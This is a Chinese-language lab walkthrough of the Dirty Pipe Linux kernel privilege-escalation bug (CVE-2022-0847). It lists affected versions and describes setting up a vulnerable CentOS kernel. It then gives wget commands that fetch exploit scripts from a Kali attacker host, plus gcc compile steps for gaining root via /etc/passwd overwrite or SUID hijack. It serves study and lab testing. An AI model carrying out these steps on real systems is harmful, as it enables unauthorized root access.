Abstract
This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 "Dirty. Cow" but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
漏洞影响版本:
5.8 <=
Linux内核版本 <5.16.11 / 5.15.25 / 5.10.102
。该漏洞已在 Linux 5.16.11、5.15.25 和 5.10.102 中修复,同时不影响 5.17-rc6 之后的 Linux 内核版本。
环境准备:
一套centos主机(注意影响版本),一套kali攻击机
kali下载两款工具:
https://github.com/imfiver/CVE-2022-0847
利用覆写/etc/passwd 来提权https://haxx.in/files/dirtypipez.c
利用 覆盖SUID程序来提权
centos环境准备
-
使用rpm包安装5.10.48版本的内核
yum localinstall kernel-* --skip-broken
安装所有依赖包 -
然后查看启动顺序:
awk -F\' '$1=="menuentry " {print $2}' /etc/grub2.cfg
,并将5.10的内核设为第一位
- 然后重启看看系统内核信息是否正确,这边没问题,环境准备完成
漏洞利用一:覆写/etc/passwd 来提权
- centos中使用普通用户登录,使用下面命令,进行下载覆写/etc/passwd进行提权
wget -c http://192.168.217.142:8000/Dirty-Pipe.sh
- 下载完成后使用 chmod 给与 Dirty-Pipe.sh 可以执行权限,随后运行进行提权
漏洞利用二:覆盖SUID程序来提权
- 继续下载漏洞利用脚本
wget -c http://192.168.217.142:8000/dirtypipez.c
- 使用 gcc dirtypipez.c -o exp 进行编译,但是在编译时出现问题,如果没有gcc环境先下载
gcc dirtypipez.c -o exp
- 解决完后,再次编译,查找 SUID 程序,然后./运行,拿下root权限
gcc -g -std=c99 -o dirtypipez dirtypipez.c
- Linux维权之后再发出来